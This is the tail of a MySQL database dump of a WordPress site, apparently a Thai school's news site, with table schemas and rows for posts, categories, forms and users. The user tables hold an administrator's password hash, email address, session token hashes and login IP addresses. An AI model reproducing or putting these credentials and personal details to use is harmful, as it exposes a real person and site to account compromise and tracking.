(2055,1,'2025-09-23 11:55:55','2025-09-23 04:55:55','<!-- wp:image {\"id\":2053,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/18-168.png\" alt=\"\" class=\"wp-image-2053\"/></figure>\n<!-- /wp:image -->','18/68','','inherit','closed','closed','','2052-revision-v1','','','2025-09-23 11:55:55','2025-09-23 04:55:55','',2052,'http://pakhaeng.ssk.in.th/?p=2055',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_qa_follow`
--

DROP TABLE IF EXISTS `wp_qa_follow`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_qa_follow` (
  `id` int(100) NOT NULL AUTO_INCREMENT,
  `author_id` int(100) NOT NULL,
  `follower_id` int(100) NOT NULL,
  `datetime` datetime NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_qa_follow`
--

LOCK TABLES `wp_qa_follow` WRITE;
/*!40000 ALTER TABLE `wp_qa_follow` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_qa_follow` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_qa_notification`
--

DROP TABLE IF EXISTS `wp_qa_notification`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_qa_notification` (
  `id` int(100) NOT NULL AUTO_INCREMENT,
  `q_id` int(100) NOT NULL,
  `a_id` int(100) NOT NULL,
  `c_id` int(100) NOT NULL,
  `user_id` int(100) NOT NULL,
  `subscriber_id` int(100) NOT NULL,
  `action` varchar(50) NOT NULL,
  `status` varchar(50) NOT NULL,
  `datetime` datetime NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_qa_notification`
--

LOCK TABLES `wp_qa_notification` WRITE;
/*!40000 ALTER TABLE `wp_qa_notification` DISABLE KEYS */;
INSERT INTO `wp_qa_notification` VALUES
(1,343,344,0,1,1,'new_answer','unread','2024-08-01 10:32:20'),
(2,343,345,0,1,1,'new_answer','unread','2024-08-01 10:34:23'),
(3,343,346,0,1,1,'new_answer','unread','2024-08-01 10:36:00');
/*!40000 ALTER TABLE `wp_qa_notification` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sgpb_subscribers`
--

DROP TABLE IF EXISTS `wp_sgpb_subscribers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_sgpb_subscribers` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `firstName` varchar(255) DEFAULT NULL,
  `lastName` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `subscriptionType` int(12) DEFAULT NULL,
  `cDate` date DEFAULT NULL,
  `status` varchar(255) DEFAULT NULL,
  `unsubscribed` int(11) DEFAULT 0,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sgpb_subscribers`
--

LOCK TABLES `wp_sgpb_subscribers` WRITE;
/*!40000 ALTER TABLE `wp_sgpb_subscribers` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sgpb_subscribers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_sgpb_subscription_error_log`
--

DROP TABLE IF EXISTS `wp_sgpb_subscription_error_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_sgpb_subscription_error_log` (
  `id` int(12) NOT NULL AUTO_INCREMENT,
  `firstName` varchar(255) DEFAULT NULL,
  `popupType` varchar(255) DEFAULT NULL,
  `email` varchar(255) DEFAULT NULL,
  `date` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_sgpb_subscription_error_log`
--

LOCK TABLES `wp_sgpb_subscription_error_log` WRITE;
/*!40000 ALTER TABLE `wp_sgpb_subscription_error_log` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_sgpb_subscription_error_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_relationships`
--

DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_relationships`
--

LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES
(16,2,0),
(17,2,0),
(18,2,0),
(19,2,0),
(20,2,0),
(37,1,0),
(37,3,0),
(37,4,0),
(63,1,0),
(63,3,0),
(63,4,0),
(66,1,0),
(66,3,0),
(66,4,0),
(69,1,0),
(69,3,0),
(92,3,0),
(95,1,0),
(95,3,0),
(187,5,0),
(191,5,0),
(194,5,0),
(197,5,0),
(200,5,0),
(203,5,0),
(206,5,0),
(209,5,0),
(212,5,0),
(215,5,0),
(218,5,0),
(221,5,0),
(224,5,0),
(227,5,0),
(230,5,0),
(234,5,0),
(237,5,0),
(240,5,0),
(245,1,0),
(245,3,0),
(275,6,0),
(285,6,0),
(292,6,0),
(343,7,0),
(370,5,0),
(373,5,0),
(376,5,0),
(379,5,0),
(383,5,0),
(386,5,0),
(389,5,0),
(392,5,0),
(395,5,0),
(398,5,0),
(402,5,0),
(405,5,0),
(408,5,0),
(411,5,0),
(414,5,0),
(417,5,0),
(420,5,0),
(423,5,0),
(426,5,0),
(429,5,0),
(432,5,0),
(435,5,0),
(438,5,0),
(441,5,0),
(444,5,0),
(447,5,0),
(450,5,0),
(453,5,0),
(456,5,0),
(520,3,0),
(553,2,0),
(554,2,0),
(789,5,0),
(792,1,0),
(792,3,0),
(905,1,0),
(905,3,0),
(1029,5,0),
(1090,1,0),
(1090,4,0),
(1108,1,0),
(1108,3,0),
(1132,5,0),
(1136,5,0),
(1139,1,0),
(1139,3,0),
(1159,6,0),
(1164,1,0),
(1164,3,0),
(1180,5,0),
(1186,3,0),
(1200,5,0),
(1205,5,0),
(1208,4,0),
(1217,4,0),
(1223,4,0),
(1230,1,0),
(1243,6,0),
(1256,5,0),
(1317,3,0),
(1333,3,0),
(1359,1,0),
(1359,3,0),
(1372,5,0),
(1375,5,0),
(1379,1,0),
(1379,3,0),
(1391,5,0),
(1400,5,0),
(1403,1,0),
(1421,1,0),
(1421,3,0),
(1457,1,0),
(1457,3,0),
(1477,5,0),
(1480,5,0),
(1765,5,0),
(1768,1,0),
(1768,4,0),
(1776,5,0),
(1800,6,0),
(1804,1,0),
(1804,3,0),
(1852,3,0),
(1867,5,0),
(1924,1,0),
(1925,5,0),
(1928,5,0),
(1932,5,0),
(1936,1,0),
(1944,1,0),
(1995,5,0),
(2002,1,0),
(2052,5,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_term_taxonomy`
--

DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_term_taxonomy`
--

LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES
(1,1,'category','',0,23),
(2,2,'nav_menu','',0,7),
(3,3,'category','',0,22),
(4,4,'category','',0,8),
(5,5,'category','',0,69),
(6,6,'category','',0,6),
(7,7,'question_cat','General',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_termmeta`
--

DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_termmeta`
--

LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_terms`
--

DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_terms`
--

LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES
(1,'ข่าวประชาสัมพันธ์','pr',0),
(2,'Primary Menu','primary-menu',0),
(3,'ข่าวกิจกรรมโรงเรียน','%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99',0),
(4,'ผลงานนักเรียน/ครู','%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9',0),
(5,'วารสารประชาสัมพันธ์','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c',0),
(6,'วิดีโอกิจกรรมโรงเรียน','%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99',0),
(7,'General','general',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=42 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES
(1,1,'nickname','admin'),
(2,1,'first_name',''),
(3,1,'last_name',''),
(4,1,'description',''),
(5,1,'rich_editing','true'),
(6,1,'syntax_highlighting','true'),
(7,1,'comment_shortcuts','false'),
(8,1,'admin_color','fresh'),
(9,1,'use_ssl','0'),
(10,1,'show_admin_bar_front','true'),
(11,1,'locale',''),
(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),
(13,1,'wp_user_level','10'),
(14,1,'dismissed_wp_pointers','wpmudev_recommended_plugins,popup-editor-1,popup-editor-3,popup-editor-6'),
(15,1,'show_welcome_panel','0'),
(17,1,'wp_dashboard_quick_press_last_post_id','2051'),
(18,1,'community-events-location','a:1:{s:2:\"ip\";s:9:\"1.2.185.0\";}'),
(19,1,'wp_user-settings','libraryContent=browse&editor=tinymce&question_cat_tab=pop&posts_list_mode=list&mfold=o'),
(20,1,'wp_user-settings-time','1752635627'),
(21,1,'wp_persisted_preferences','a:4:{s:4:\"core\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:10:\"openPanels\";a:3:{i:0;s:11:\"post-status\";i:1;s:23:\"taxonomy-panel-post_tag\";i:2;s:23:\"taxonomy-panel-category\";}}s:14:\"core/edit-post\";a:1:{s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2025-09-11T07:30:42.681Z\";s:17:\"core/edit-widgets\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}}'),
(22,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),
(23,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),
(24,1,'nav_menu_recently_edited','2'),
(25,1,'generateblocks_onboarding','a:1:{s:22:\"insert_inner_container\";b:1;}'),
(26,1,'closedpostboxes_page','a:1:{i:0;s:15:\"seed_social_box\";}'),
(27,1,'metaboxhidden_page','a:1:{i:0;s:19:\"seed_social_disable\";}'),
(29,1,'wpforms_overview_table_columns','a:6:{i:1;s:4:\"name\";i:2;s:4:\"tags\";i:3;s:6:\"author\";i:4;s:9:\"shortcode\";i:5;s:7:\"created\";i:6;s:9:\"locations\";}'),
(32,1,'wpforms_dismissed','a:1:{s:32:\"edu-builder-lite-connect-top-bar\";i:1722574407;}'),
(34,1,'meta-box-order_page','a:4:{s:6:\"normal\";s:0:\"\";s:8:\"advanced\";s:35:\"seed_social_box,seed_social_disable\";s:4:\"side\";s:0:\"\";s:15:\"acf_after_title\";s:0:\"\";}'),
(35,1,'elementor_introduction','a:2:{s:27:\"ai-get-started-announcement\";b:1;s:20:\"globals_introduction\";b:1;}'),
(36,1,'_pum_dismissed_alerts','a:0:{}'),
(37,1,'elementor_dismissed_editor_notices','a:1:{i:0;s:20:\"image_optimizer_hint\";}'),
(38,1,'embedpress_optin_notice_dismissed','1'),
(40,1,'wp_elementor_enable_ai','1'),
(41,1,'session_tokens','a:6:{s:64:\"5870776a1de7b951044fcca4faf5c16df433dd97036e4ce414ef7424762661cf\";a:4:{s:10:\"expiration\";i:1758694282;s:2:\"ip\";s:13:\"106.0.143.177\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\";s:5:\"login\";i:1758521482;}s:64:\"b17157a55382671c0cb7eefc9f27569023885b75fba3c509b17311ea3ee33328\";a:4:{s:10:\"expiration\";i:1758775956;s:2:\"ip\";s:13:\"106.0.143.177\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\";s:5:\"login\";i:1758603156;}s:64:\"6c9115aa5bbc5c695abb361d62c8393b0a5c495e1952a2b36e82d54fa3144988\";a:4:{s:10:\"expiration\";i:1758854467;s:2:\"ip\";s:13:\"124.120.15.64\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36\";s:5:\"login\";i:1758681667;}s:64:\"002be11618346012e7e5ee0a5ba4346b1ae981fbd3a92e2ef7af2713afb99f8f\";a:4:{s:10:\"expiration\";i:1758855813;s:2:\"ip\";s:11:\"1.2.185.143\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\";s:5:\"login\";i:1758683013;}s:64:\"3ae5df6e4ebbbf91468e7910e2d98d4f6cec5a6c6683f7a26c6bbfaa2329f315\";a:4:{s:10:\"expiration\";i:1758860418;s:2:\"ip\";s:11:\"1.2.185.143\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\";s:5:\"login\";i:1758687618;}s:64:\"77da11cf2cd6faed74f013e08e843a7bf7017c64b560f76f954bb4fdb8fa85c5\";a:4:{s:10:\"expiration\";i:1758864498;s:2:\"ip\";s:11:\"1.46.130.79\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36\";s:5:\"login\";i:1758691698;}}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT 0,
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES
(1,'admin','$wp$2y$10$RGfeIplBHd8IApk0rIIY5uMxknC/uELCef8F3UeQ90/gflT.rPJ9y','admin','patcharapol@ro.ac.th','http://pakhaeng.ssk.in.th','2024-07-27 02:28:21','',0,'admin');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_logs`
--

DROP TABLE IF EXISTS `wp_wpforms_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_logs` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL,
  `message` longtext NOT NULL,
  `types` varchar(255) NOT NULL,
  `create_at` datetime NOT NULL,
  `form_id` bigint(20) DEFAULT NULL,
  `entry_id` bigint(20) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_logs`
--

LOCK TABLES `wp_wpforms_logs` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_logs` DISABLE KEYS */;
INSERT INTO `wp_wpforms_logs` VALUES
(1,'Migration','Migration of WPForms to 1.9.1 started.','log','2025-05-14 08:44:49',0,0,1),
(2,'Migration','Migration of WPForms to 1.9.1 completed.','log','2025-05-14 08:44:50',0,0,1),
(3,'Migration','Migration of WPForms to 1.9.2 started.','log','2025-05-14 08:44:50',0,0,1),
(4,'Migration','Migration of WPForms to 1.9.2 completed.','log','2025-05-14 08:45:01',0,0,1),
(5,'Migration','Migration of WPForms to 1.9.5.2 is fully completed.','log','2025-05-14 08:45:01',0,0,1);
/*!40000 ALTER TABLE `wp_wpforms_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_payment_meta`
--

DROP TABLE IF EXISTS `wp_wpforms_payment_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_payment_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `payment_id` bigint(20) NOT NULL,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `payment_id` (`payment_id`),
  KEY `meta_key` (`meta_key`(191)),
  KEY `meta_value` (`meta_value`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_payment_meta`
--

LOCK TABLES `wp_wpforms_payment_meta` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_payment_meta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpforms_payment_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_payments`
--

DROP TABLE IF EXISTS `wp_wpforms_payments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_payments` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `form_id` bigint(20) NOT NULL,
  `status` varchar(10) NOT NULL DEFAULT '',
  `subtotal_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `discount_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `total_amount` decimal(26,8) NOT NULL DEFAULT 0.00000000,
  `currency` varchar(3) NOT NULL DEFAULT '',
  `entry_id` bigint(20) NOT NULL DEFAULT 0,
  `gateway` varchar(20) NOT NULL DEFAULT '',
  `type` varchar(12) NOT NULL DEFAULT '',
  `mode` varchar(4) NOT NULL DEFAULT '',
  `transaction_id` varchar(40) NOT NULL DEFAULT '',
  `customer_id` varchar(40) NOT NULL DEFAULT '',
  `subscription_id` varchar(40) NOT NULL DEFAULT '',
  `subscription_status` varchar(10) NOT NULL DEFAULT '',
  `title` varchar(255) NOT NULL DEFAULT '',
  `date_created_gmt` datetime NOT NULL,
  `date_updated_gmt` datetime NOT NULL,
  `is_published` tinyint(1) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `form_id` (`form_id`),
  KEY `status` (`status`(8)),
  KEY `total_amount` (`total_amount`),
  KEY `type` (`type`(8)),
  KEY `transaction_id` (`transaction_id`(32)),
  KEY `customer_id` (`customer_id`(32)),
  KEY `subscription_id` (`subscription_id`(32)),
  KEY `subscription_status` (`subscription_status`(8)),
  KEY `title` (`title`(64))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_payments`
--

LOCK TABLES `wp_wpforms_payments` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_payments` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpforms_payments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpforms_tasks_meta`
--

DROP TABLE IF EXISTS `wp_wpforms_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wpforms_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) NOT NULL,
  `data` longtext NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpforms_tasks_meta`
--

LOCK TABLES `wp_wpforms_tasks_meta` WRITE;
/*!40000 ALTER TABLE `wp_wpforms_tasks_meta` DISABLE KEYS */;
INSERT INTO `wp_wpforms_tasks_meta` VALUES
(1,'wpforms_process_forms_locator_scan','W10=','2024-08-02 04:03:45'),
(2,'wpforms_admin_addons_cache_update','W10=','2024-08-02 04:03:45'),
(3,'wpforms_admin_builder_templates_cache_update','W10=','2024-08-02 04:03:45'),
(4,'wpforms_builder_help_cache_update','W10=','2024-08-02 04:04:45'),
(6,'wpforms_process_purge_spam','W10=','2025-05-14 08:44:51'),
(7,'wpforms_process_forms_locator_scan','W10=','2025-06-25 03:45:03'),
(8,'wpforms_process_purge_spam','W10=','2025-06-25 03:45:03'),
(10,'wpforms_process_forms_locator_scan','W10=','2025-06-25 03:46:06'),
(11,'wpforms_process_purge_spam','W10=','2025-06-25 03:46:06');
/*!40000 ALTER TABLE `wp_wpforms_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Dumping events for database 'w169'
--

--
-- Dumping routines for database 'w169'
--
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2026-04-03 20:00:48